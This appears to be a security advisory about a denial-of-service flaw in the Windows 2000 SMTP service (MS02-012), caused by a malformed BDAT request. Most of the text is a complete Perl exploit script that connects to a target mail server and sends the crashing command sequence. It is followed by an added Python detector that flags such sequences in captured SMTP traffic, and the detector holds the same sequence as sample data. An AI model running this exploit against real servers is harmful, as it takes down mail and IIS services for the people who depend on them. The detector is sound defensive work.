Windows SMTP Service Denial of Service (BDAT)

Summary

As we reported in our previous article, Malformed Data Transfer Request Causes Windows SMTP Service to Fail, it is possible to crash Microsoft's SMTP server by sending it a malformed BDAT request. The following exploit code can be used by administrators to test their servers for the vulnerability.

Credit:

The information has been provided by H D Moore.


Details

Exploit:
#!/usr/bin/perl -w
##################
#
#
# URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
# Denial of Service attack through the BDAT command. If exploited, this
# vulnerability will cause any and all services running under IIS (the
# inetinfo.exe process) to become unavailable.
#
#
# Solution:
#
# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#

use IO::Socket;

# Target defaults to localhost when no address is given on the command line
$target = shift() || '127.0.0.1';
my $port = 25;
my $rcpt = 'Administrator';
my $from = 'crash@burn.com';

my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

# Read the SMTP greeting; anything other than a 2xx reply is treated as an error
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $from\r\n";
$resp = <$sock>;

print $sock "RCPT TO: $rcpt\r\n";
$resp = <$sock>;

# Malformed data transfer request
print $sock "BDAT 4\r\n";
print $sock "b00mAUTH LOGIN\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
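
A defensive counterpart to the script above, as an added example that is not part of the original advisory or of H D Moore's code: a Python check that walks a captured client-to-server SMTP byte stream (for instance, one reassembled from a packet capture) and flags commands sent inside an unfinished BDAT transfer. The allowed-command set, the function name and both sample streams are assumptions constructed for this example.

```python
import re

# Commands tolerated between a non-final BDAT chunk and BDAT LAST
# (a heuristic chosen for this example, not taken from the advisory).
ALLOWED_MID_CHUNK = {"BDAT", "RSET", "NOOP", "QUIT"}

# Constructed sample: mirrors the command sequence shown in the script above.
SUSPECT = (b"HELO mail.example.test\r\nMAIL FROM: a@example.test\r\n"
           b"RCPT TO: b@example.test\r\nBDAT 4\r\nb00mAUTH LOGIN\r\n\r\n\r\n")
# Constructed sample: a well-formed two-chunk transfer.
BENIGN = (b"EHLO client.example.test\r\nMAIL FROM:<a@example.test>\r\n"
          b"RCPT TO:<b@example.test>\r\nBDAT 5\r\nhelloBDAT 7 LAST\r\nworld\r\nQUIT\r\n")

def audit_client_stream(data: bytes) -> list:
    """Walk a client-to-server SMTP byte stream and report BDAT anomalies."""
    findings, pos, chunking = [], 0, False
    while pos < len(data):
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            findings.append(f"offset {pos}: unterminated command line")
            break
        line, start = data[pos:eol].decode("latin-1"), pos
        pos = eol + 2
        verb = line.split(" ", 1)[0].upper()
        if verb == "BDAT":
            m = re.fullmatch(r"BDAT (\d+)( LAST)?", line, re.I)
            if not m:
                findings.append(f"offset {start}: malformed BDAT line {line!r}")
                continue
            size = int(m.group(1))
            if pos + size > len(data):
                findings.append(f"offset {start}: BDAT declares {size} octets, "
                                f"{len(data) - pos} present")
                break
            pos += size                      # chunk octets are raw data, not commands
            chunking = m.group(2) is None    # still open until a chunk carries LAST
        elif chunking and verb not in ALLOWED_MID_CHUNK:
            what = "empty line" if not line else f"{verb} command"
            findings.append(f"offset {start}: {what} inside unfinished BDAT transfer")
        if verb in ("RSET", "QUIT"):
            chunking = False                 # transaction abandoned or session ended
    return findings

if __name__ == "__main__":
    for name, stream in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, audit_client_stream(stream))
```

The parser skips exactly the declared number of octets after each BDAT line, so bytes that follow a short chunk are interpreted as commands, the same way a receiving server would see them.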
